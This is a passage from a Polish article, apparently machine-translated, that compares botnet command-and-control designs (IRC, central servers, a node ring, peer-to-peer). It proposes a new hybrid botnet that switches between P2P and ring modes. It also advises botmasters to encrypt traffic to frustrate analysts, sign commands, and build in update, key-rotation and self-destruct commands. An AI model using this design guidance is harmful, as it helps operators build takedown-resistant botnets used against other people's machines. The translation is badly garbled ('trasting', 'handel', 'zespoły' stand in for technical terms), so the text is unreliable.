  • Niech trasting składa się z 512 węzłów, co najmniej 50% jest stale w trybie online. Jeśli w sieci znajduje się 1 000 000 botów i każdy z nich jest stale online, na każdy węzeł śledzenia będzie mniej niż 4000 botów. Gdy bot żąda poleceń (lub wysyłając wynik) co 10 minut, każdy węzeł pierścieniowy jednocześnie przetwarza średnio 7 połączeń. Trochę jak na sieć tej wielkości, prawda?
  • Dokładną listę wszystkich botów może uzyskać tylko botmaster.
  • Możesz wydawać polecenia konkretnemu botowi lub grupie botów.
  • Szybka reakcja botów na zespoły.
  • Botmaster jest trudny do znalezienia.

Jedyny minus, jaki widzę, to złożoność wdrożenia.

4. Sieci peer-to-peer

Według źródeł internetowych botnety P2P są obecnie bardzo popularne. Spośród tych źródeł najbardziej godne uwagi. Każdy węzeł takiej sieci zna tylko kilka „sąsiadujących” węzłów. Botmaster wysyła polecenia do kilku węzłów sieci, po czym jest przesyłany od sąsiada do sąsiada.

Lista sąsiadów jest wydawana botom raz na specjalnym serwerze. Może to być na przykład zaatakowana witryna. Serwer nic nie robi, jest potrzebny tylko podczas dodawania węzłów do botnetu.

  • Implementacja jest nieco prostsza niż w poprzednim akapicie.
  • Minimalne obciążenie wszystkich węzłów sieci. Rozmiar botnetu jest prawie nieograniczony.
  • Odporność na DDoS, odłączenie hosta itp. Uruchomienie botnetu p2p jest prawie niemożliwe.
  • Brak stałych połączeń, jak w przypadku IRC.
  • Potrzebujesz serwera, choć nie na długo.
  • Węzły giną od czasu do czasu, co wpływa na łączność sieci.
  • Aby uzyskać listę wszystkich botów, musisz na przykład dać im polecenie dostępu do określonej witryny. W takim przypadku nie ma gwarancji, że tylko botmaster otrzyma listę.
  • Aby przekazać polecenie do określonego węzła, musisz albo wysłać je do całej sieci, albo połączyć bezpośrednio z węzłem.
  • Powolna reakcja botów na drużyny.
  • Aby wysłać „długie” polecenie, na przykład z listą adresów URL, musisz użyć serwera innej firmy, w przeciwnym razie reakcja botów spowolni jeszcze bardziej.
  • Łatwiej jest znaleźć botmasterów niż w poprzednim przykładzie ze względu na użycie jakiegoś serwera.

Oczywiście mogę się mylić, ale moim zdaniem botnety p2p są znacznie gorsze od trastowania. Może producenci oprogramowania antywirusowego milczą na jakiś temat?

5. Kompletne rozwiązanie

Jednym ze sposobów na wymyślenie czegoś nowego i dobrego jest przekroczenie czegoś starego. Połączyliśmy telefon, komputer, magnetofon, kamerę i kamerę wideo - dostaliśmy smartfon . Nikogo nie zaskoczysz komputerem i klimatyzacją w samochodzie. Przyklej magnes do lodówki do każdego jogurtu, a sprzedaż gwałtownie wzrośnie.

Ważne jest, aby pamiętać, że przy nieudanych krzyżach możemy uzyskać niezdatną do użytku osobę. Przypomina algorytmy genetyczne prawda? Weźmy na pozór dobry pomysł - botnet p2p, w którym trasting jest odpowiedzialny za wyznaczanie sąsiadów. Zatem nie potrzebujemy żadnego serwera!

Ale w tym przypadku złożoność wdrożenia wzrośnie, choć niewiele. Pozostałe problemy botnetu p2p pozostaną nierozwiązane. Zysk jest znikomy, wynik wynosi 1: 1.

Po odrobinie siedzenia z kawałkiem papieru i ołówkiem narodziłem się z następującym pomysłem. O ile mi wiadomo, nigdy wcześniej nie było to wyrażane i jestem pierwszym, który wymyślił coś takiego. ChSV plus 100.

Co jeśli sieć ma dwa stany - „aktywny” i „pasywny”. W stanie pasywnym botnet działa zgodnie ze schematem p2p. Botmaster wysyła polecenie „zmobilizowania żołnierzy”, a sieć zamienia się w trasting. W swoim zespole botmaster musi wskazać węzły śledzenia i czas, w którym sieć zmienia swój stan. Aby powiększyć pierścień, możesz wydać polecenie kilku botom, aby wymieniły swoich sąsiadów. Ponadto wszystkie zespoły są przekazywane za pośrednictwem trastingu. Odpowiada za wyznaczanie „sąsiadów” do nowych węzłów. Jeśli następnie pierścień TTL nie wystarczy, możesz wydać polecenie „przedłużyć stan aktywny”.

Taki botnet nie odziedziczy ani jednego minusu sieci p2p i będzie miał wszystkie zalety śledzenia, a także:

  • Zwiększona odporność na ataki ddos \u200b\u200bi filtry sieciowe, takie jak sieć p2p.
  • Minimalne zużycie zasobów przez boty podczas przestoju sieci. Botmaster nie musi monitorować stanu trastingu i wybierać dla niego nowe węzły.
  • Podczas tworzenia śledzenia wybierane są tylko te węzły, które są aktualnie w trybie online. Boty połączą się z pierścieniem przy pierwszej próbie (przez chwilę).
  • Lista „sąsiadów” jest okresowo aktualizowana. W każdym razie adres IP węzłów zawartych w tymczasowym pierścieniu zna cały botnet. Niech więc te węzły będą uważane za sąsiadów, jeśli niektórzy z tych sąsiadów nie pojawili się w sieci przez długi czas.

Jedyną wadą, którą tu widzę, jest złożoność wdrożenia. Ale to nie jest tak naprawdę problem.

6. Co należy pamiętać

Do tej pory milczałem o niektórych punktach, ponieważ są one związane z dowolną z wymienionych metod kontroli botnetu. Należy zwrócić na nich uwagę.

  • Niektóre węzły nie akceptują połączeń przychodzących z powodu zapory lub NAT. Przynajmniej należy to wziąć pod uwagę podczas pisania bota. Na przykład, podczas dystrybucji poleceń w sieci p2p, sam bot powinien okresowo kontaktować się z sąsiadami i nie czekać na polecenie od nich.
  • Należy założyć, że wszystkie polecenia wysyłane do sieci są na podsłuchu. Zainteresowana osoba może przynajmniej zmodyfikować kod bota do tych celów. Ma to jednak sens szyfruj cały ruch przesyłane przez sieć. Przynajmniej skomplikuje to analizę botnetów.
  • Wszystkie zespoły botmasterów muszą się zapisać podpisany cyfrowo . Hasła nie działają, ponieważ można je przechwycić.
  • Ponieważ mówimy o implementacji, zauważam, że w każdym botnecie powinny znajdować się co najmniej trzy polecenia - aktualizacja botów, aktualizacja klucza botmastera i autodestrukcja całej sieci.
  • W sieci znajdują się węzły szpiegowskie. Niektóre z nich są uwzględnione w obrocie. Jednocześnie nie znamy celów, do których dążą ci „szpiedzy” - może to być określenie botmastera IP, zakłócenie wykonywania poleceń, wyłączenie sieci, uzyskanie kontroli nad botnetem i tak dalej. W szczególności oznacza to, że boty muszą wybrać losowy węzeł podczas łączenia się z pierścieniem i nie używać tego samego przez cały czas.
  • Na rysunku węzły śledzenia są połączone z każdym z nich, ale o wiele bardziej praktyczne jest wdrożenie pierścienia w postaci małej sieci p2p, to znaczy zgodnie z zasadą „sąsiadów”.

Zauważam również, że rozwiązania 1 i 2 (serwer, wiele serwerów) są pozbawione wielu minusów i mają kilka zalet z rozwiązania 3 (śledzenie) podczas korzystania z protokołu HTTP. Przewiń te punkty ponownie, aby zobaczyć, co mam na myśli.

7. Wnioski

W przypadku małych sieci dobrym rozwiązaniem jest użycie IRC. Na przykład, jeśli chcesz stworzyć własną małą sieć do przetwarzania rozproszonego, zainstaluj bota na komputerze domowym, laptopie, netbooku, komputerze roboczym (jeśli pozwalają na to zasady firmy) i zarządzaj siecią za pośrednictwem DalNet. Jeśli to konieczne, później sieć może zostać „przepompowana” przed rozpoczęciem handlu. Podajesz odpowiednie polecenie, prawda?

Jeśli botnet potrzebuje pięknego interfejsu WWW, warto napisać dodatkowy program, który będzie pobierał polecenia z serwera WWW i wysyłał je do IRC. Rozważ przynajmniej to podejście.

Rozwiązaniami uniwersalnymi są handel i handel p2p +. Takie sieci będą działać idealnie bez względu na to, ile mają węzłów, 1 lub 1 000 000, bez żadnych serwerów.

Ze względu na obecność wyraźnych wad „p2p” w porównaniu do pierścienia, nie jest dla mnie jasne, dlaczego uważa się to za dobre rozwiązanie. Na pewno jest wiele przydatnych funkcji botów tworzących sieć. Dlaczego nie dodać kolejnej niewielkiej ładowności - mobilizacji sieci do handlu?

To chyba wszystko. Będę zadowolony z waszych komentarzy. Zwłaszcza z krytyką, wskazaniami nieścisłości / sprzeczności w tekście i twoimi pomysłami na poruszony temat.

Dzielić
Dzielić
Ćwierkać
Lubić
Lubić

Czytaj także

DZWONEK

Są tacy, którzy czytają te wiadomości przed tobą.
Subskrybuj, aby otrzymywać świeże artykuły.
E-mail
Imię
Nazwisko
Jak chcesz przeczytać Dzwon
Bez spamu